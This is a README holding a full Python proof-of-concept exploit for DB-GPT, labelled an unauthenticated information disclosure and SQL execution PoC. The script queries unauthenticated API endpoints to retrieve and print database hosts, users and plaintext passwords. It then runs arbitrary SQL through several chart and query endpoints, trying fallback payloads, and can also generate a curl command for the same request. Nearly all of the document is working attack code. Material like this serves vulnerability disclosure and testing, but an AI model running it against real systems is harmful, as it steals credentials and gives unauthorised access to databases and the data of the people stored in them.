README.md
Rendering markdown...
import requests
import json
import urllib3
import argparse
import sys
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
def banner():
print(r"""
____ ____ ________ ____ ______ ____ ____ ______
/ __ \/ __ )/ ____/ |/ / |/ / _/ / __ \/ __ \/ ____/
/ / / / __ / / __/ /|_/ / /|_/ // / / /_/ / / / / /
/ /_/ / /_/ / /_/ / / / / / / // / / ____/ /_/ / /___
/_____/_____/\____/_/ /_/_/ /_/___/ /_/ \____/\____/
[+] DBGPT Unauthenticated Information Disclosure & SQL Execution PoC
""")
# DB Type to Version Query Mapping
DB_QUERIES = {
"mysql": "SELECT VERSION();",
"postgresql": "SELECT version();",
"postgres": "SELECT version();",
"sqlite": "SELECT sqlite_version();",
"oracle": "SELECT banner FROM v$version WHERE ROWNUM = 1;",
"mssql": "SELECT @@VERSION;",
"sqlserver": "SELECT @@VERSION;",
"dm": "SELECT * FROM v$version;", # Dameng DB
"kingbase": "SELECT version();", # Kingbase
}
def get_smart_sql(db_type, default_sql):
"""
Select appropriate SQL query based on database type if user didn't specify a custom one.
"""
if not db_type:
return default_sql
db_type = db_type.lower()
# If the default SQL is generic (SELECT VERSION()), try to find a specific one
if "select version()" in default_sql.lower():
for key, query in DB_QUERIES.items():
if key in db_type:
return query
return default_sql
def get_datasources(base_url):
"""
Attempt to retrieve database credentials from known endpoints.
"""
endpoints = [
"/api/v2/serve/datasources",
"/api/v1/chat/db/list",
"/api/v1/editor/db/list" # Sometimes this exists too
]
found_dbs = []
for endpoint in endpoints:
target_url = base_url.rstrip("/") + endpoint
print(f"[*] Trying to fetch datasources from: {target_url}")
try:
response = requests.get(target_url, verify=False, timeout=10)
if response.status_code == 200:
try:
data = response.json()
# Check if success is true
if data.get("success") is True:
db_list = data.get("data", [])
if db_list:
print(f"[+] SUCCESS! Found {len(db_list)} database configurations at {endpoint}")
for db in db_list:
# Extract key info
# Handle different JSON structures
if "params" in db:
params = db.get("params", {})
db_info = {
"id": db.get("id"),
"type": db.get("type"),
"name": params.get("database") or db.get("db_name"),
"user": params.get("user"),
"password": params.get("password"),
"host": params.get("host"),
"port": params.get("port"),
"driver": params.get("driver")
}
else:
# Structure for /api/v1/chat/db/list (alternative format)
db_info = {
"id": db.get("id"),
"type": db.get("db_type"),
"name": db.get("db_name"),
"user": db.get("db_user"),
"password": db.get("db_pwd"),
"host": db.get("db_host"),
"port": db.get("db_port"),
"driver": db.get("db_type")
}
found_dbs.append(db_info)
# If we found data, we can stop trying other endpoints or continue to gather more
# Let's return what we found from this working endpoint
return found_dbs
else:
print(f"[-] Endpoint {endpoint} returned success but no data.")
else:
print(f"[-] Endpoint {endpoint} returned success=false.")
except json.JSONDecodeError:
print(f"[-] Endpoint {endpoint} did not return valid JSON.")
else:
print(f"[-] Endpoint {endpoint} returned status code: {response.status_code}")
except Exception as e:
print(f"[!] Error connecting to {target_url}: {e}")
return found_dbs
def run_sql(base_url, db_name, sql_query, generate_curl=False):
"""
Execute SQL query using various endpoints to bypass potential server-side bugs.
"""
# If generating curl, we just use the first standard endpoint and exit
if generate_curl:
target_url = base_url.rstrip("/") + "/api/v1/editor/chart/run"
payload = {
"db_name": db_name,
"chart_type": "bar",
"sql": sql_query
}
# Compact JSON for curl
json_payload = json.dumps(payload)
# Format for Windows/PowerShell friendliness
print("\n[+] Generated cURL command:")
print(f'curl -X POST "{target_url}" -H "Content-Type: application/json" -d \'{json_payload}\'')
return True
endpoints = [
"/api/v1/editor/chart/run", # Standard endpoint
"/api/v1/sql/exec", # Alternative
"/api/v1/editor/db/run", # Another possibility
"/api/v2/serve/query" # v2 API attempt
]
headers = {
"Content-Type": "application/json",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
}
print(f"\n[*] Executing SQL on database '{db_name}': {sql_query}")
# Try different endpoints
for endpoint in endpoints:
target_url = base_url.rstrip("/") + endpoint
# print(f"[*] Trying endpoint: {endpoint}")
# Try different payloads if the first one fails
payloads = [
# Standard payload
{
"db_name": db_name,
"chart_type": "bar",
"sql": sql_query
},
# Payload with dummy chart info (sometimes required)
{
"db_name": db_name,
"chart_type": "bar",
"sql": sql_query,
"chart_name": "test_chart",
"chart_desc": "test_desc"
},
# Simplified payload for raw SQL execution endpoints
{
"db_name": db_name,
"sql": sql_query
}
]
for i, payload in enumerate(payloads):
try:
# specific handling for different endpoints might be needed, but generic payloads cover most cases
response = requests.post(target_url, json=payload, headers=headers, verify=False, timeout=15)
if response.status_code == 200:
try:
data = response.json()
if data.get("success") is True:
# Handle different response structures
sql_data = data.get("data", {})
# Sometimes data is directly in 'data', sometimes in 'data.sql_data'
if "sql_data" in sql_data:
sql_data = sql_data.get("sql_data", {})
columns = sql_data.get("colunms", []) or sql_data.get("columns", []) # Handle typo in API response 'colunms'
values = sql_data.get("values", [])
print(f"[+] SQL Execution Successful! (Endpoint: {endpoint})")
if columns:
print(f" Columns: {columns}")
if values:
print(" Results:")
for row in values:
print(f" {row}")
else:
print(" (No rows returned)")
return True
else:
err_msg = data.get('err_msg', '')
# Only print error if it's the last attempt or a significant error
if "unexpected keyword argument 'params'" in err_msg:
print(f"[-] Server Error at {endpoint}: Backend code bug (unexpected 'params'). This is common in some DBGPT versions with PostgreSQL.")
elif i == len(payloads) - 1:
print(f"[-] SQL Execution Failed at {endpoint}. Message: {err_msg}")
except json.JSONDecodeError:
pass # create noise only if all fail
elif response.status_code == 404:
pass # Endpoint doesn't exist, try next
else:
pass # Other errors, try next
except Exception as e:
pass # Network errors, try next
print("[-] All SQL execution attempts failed.")
return False
def main():
banner()
examples = """
Examples:
# Basic check for DB info and version
python dbgpt_poc.py -u https://dbgpt.example.com
# Execute custom SQL
python dbgpt_poc.py -u https://dbgpt.example.com --sql "SELECT user();"
# Specify a database name if auto-detection fails
python dbgpt_poc.py -u https://dbgpt.example.com --db "target_db" --sql "SHOW TABLES;"
"""
parser = argparse.ArgumentParser(
description="DBGPT Vulnerability PoC",
epilog=examples,
formatter_class=argparse.RawDescriptionHelpFormatter
)
parser.add_argument("-u", "--url", required=True, help="Target URL (e.g., https://dbgpt.example.com)")
parser.add_argument("-s", "--sql", default="SELECT VERSION();", help="SQL query to execute (default: SELECT VERSION())")
parser.add_argument("--db", help="Specific database name to use for SQL execution (optional, otherwise uses discovered DBs)")
parser.add_argument("--curl", action="store_true", help="Generate cURL command instead of executing SQL")
args = parser.parse_args()
# 1. Get Datasources / Leak Info
print("--- [ Phase 1: Information Disclosure ] ---")
dbs = get_datasources(args.url)
valid_db_names = []
if dbs:
print(f"\n[+] Found {len(dbs)} Database Configurations:")
for i, db in enumerate(dbs):
print(f"\n [{i+1}] Database ID: {db['id']}")
print(f" Name : {db['name']}")
print(f" Type : {db['type']}")
print(f" Host : {db['host']}")
print(f" Port : {db['port']}")
print(f" User : {db['user']}")
print(f" Password : {db['password']}") # Leaked credential
if db['name']:
valid_db_names.append(db['name'])
else:
print("[-] No datasources found. Authentication might be required or endpoints patched.")
# 2. SQL Execution
print("\n--- [ Phase 2: SQL Execution ] ---")
targets = []
# Prioritize user-provided DB
if args.db:
print(f"[*] Using manually specified database: {args.db}")
targets.append({"name": args.db, "type": "unknown"}) # We don't know type if manually specified
# If no manual DB, use discovered ones
elif dbs:
print(f"[*] Using discovered databases for SQL execution...")
targets = dbs # Use all found DBs, not just names, to get their types
if not targets:
print("[-] No database targets available for SQL execution.")
print(" Tips: Use --db <name> to manually specify a target if Information Disclosure failed.")
return
# Execute SQL on each target
for target in targets:
db_name = target['name']
db_type = target.get('type')
if not db_name:
# Handle case where name is None/Empty
print(f"[-] Skipping target with empty name (ID: {target.get('id')})")
continue
# Determine best SQL query
# If user provided a specific custom SQL (not default), use it.
# Otherwise, try to adapt based on DB type.
sql_to_run = get_smart_sql(db_type, args.sql)
if not args.curl:
print(f"\n[+] Target: {db_name} (Type: {db_type})")
if sql_to_run != args.sql:
print(f" -> Adapted SQL for {db_type}: {sql_to_run}")
run_sql(args.url, db_name, sql_to_run, generate_curl=args.curl)
if __name__ == "__main__":
main()